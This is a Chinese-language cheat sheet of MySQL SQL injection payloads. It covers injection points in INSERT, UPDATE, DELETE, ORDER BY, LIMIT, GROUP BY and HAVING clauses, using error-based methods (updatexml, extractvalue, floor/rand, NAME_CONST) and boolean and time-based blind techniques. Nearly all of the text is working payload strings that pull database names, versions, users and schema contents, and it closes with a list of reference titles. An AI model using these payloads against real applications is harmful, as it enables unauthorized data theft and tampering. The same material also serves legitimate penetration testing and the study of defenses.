Insert:
文法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)
報錯注入:
insert into test(id,name,pass) values (6,‘xiaozi‘ or updatexml(1,concat(0x7e,(database()),0x7e),0) or ‘‘, ‘Nervo‘);
insert into test(id,name,pass) values (6,‘xiaozi‘ or extractvalue(1,concat(0x7e,database())) or ‘‘, ‘Nervo‘);
盲注:
//根據 or 之間的運算式是否成立來進行盲注
‘or 1=1 or ‘ //插入的測試語句直接被當成 SQL 語句執行,並儲存其傳回值;運算式成立,返回結果為 1
‘or 1=2 or ‘ //運算式不成立,返回結果為 0
‘ or exists(select * from information_schema.tables) or‘ //返回結果為1
aaa‘ or length(database())=11 or ‘//返回正確
aaa‘ or mid(database(),1,1)=‘t‘ or‘//返回正確
aaa‘ or mid(database(),1,11)=‘test‘ or ‘//返回正確
insert into test(id,name,pass) values (2,‘mis1‘,‘‘or ascii(mid(database(),1,1))=116 or‘‘)
時間盲注:
insert into test(id,name,pass) values (2,‘mis1‘,‘‘or if(mid(database(),1,1)=‘a‘,sleep(10),0) or‘‘)
Update:
update test set pass=‘baidu‘ or updatexml(1,concat(0x7e,(version()),0x7e),0) or‘‘WHERE id=2 and name=‘0‘;
update test set pass=‘baidu‘ or extractvalue(1,concat(0x7e,database())) or‘‘WHERE id=2 and name=‘0‘;
Delete:
DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or‘‘;
DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or‘‘;
Order by:
order by [id]---【注入點】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
order by [id] desc/asc ---【注入點】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Limit 0,1:
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入點】
報錯注入:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ‘:5.5.41-0ubuntu0.14.04.1‘
如果注入點不會回顯錯誤訊息,還可以使用 time-based(時間盲注)的方式,payload 如下:
SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE ‘w‘, BENCHMARK(5000000,SHA1(1)),5)))),1);
Group by:
group by username --【注入點】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
Having :
Having 1=1 --【注入點】
SELECT username FROM users WHERE isadmin = 0 GROUP BY username having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
Mysql報錯注入:
1、通過floor報錯
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
2、ExtractValue
and extractvalue(1, concat(0x5c,(select user())))
3、UpdateXml
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4、利用NAME_CONST注入
and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
5、join報錯注入
mysql> select * from(select * from users a join users b)c;
mysql> select * from(select * from users a join users b using(id))c;
mysql> select * from(select * from users a join users b using(id,name))c;
Mysql盲注:
#select * from test where id =2 and length(version())=6
#select * from test where id =2 and ascii(substring(version(),7,1))>1
#select * from test where id =2 and length(database())=4
#select * from test where id =2 and ascii(mid(database(),4,1))=116
#select * from test where id =2 and (select length(version()))=6
#select * from test where id =2 and (select count(*) from test)=3
Mysql時間盲注:
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
#select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)
#select * from test where id =2 and if(substring(user(),1,1)=‘r‘,sleep(5),0)
#select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)
參考資料:
1、 Mysql報錯注入原理分析(count()、rand()、group by)
2、關於Mysql注入過程中的五種報錯方式及具體利用案例
3、利用insert,update和delete注入擷取資料
4、Testing Injection
5、MySQL注入總結
Mysql 下 Insert、Update、Delete、Order By、Group By注入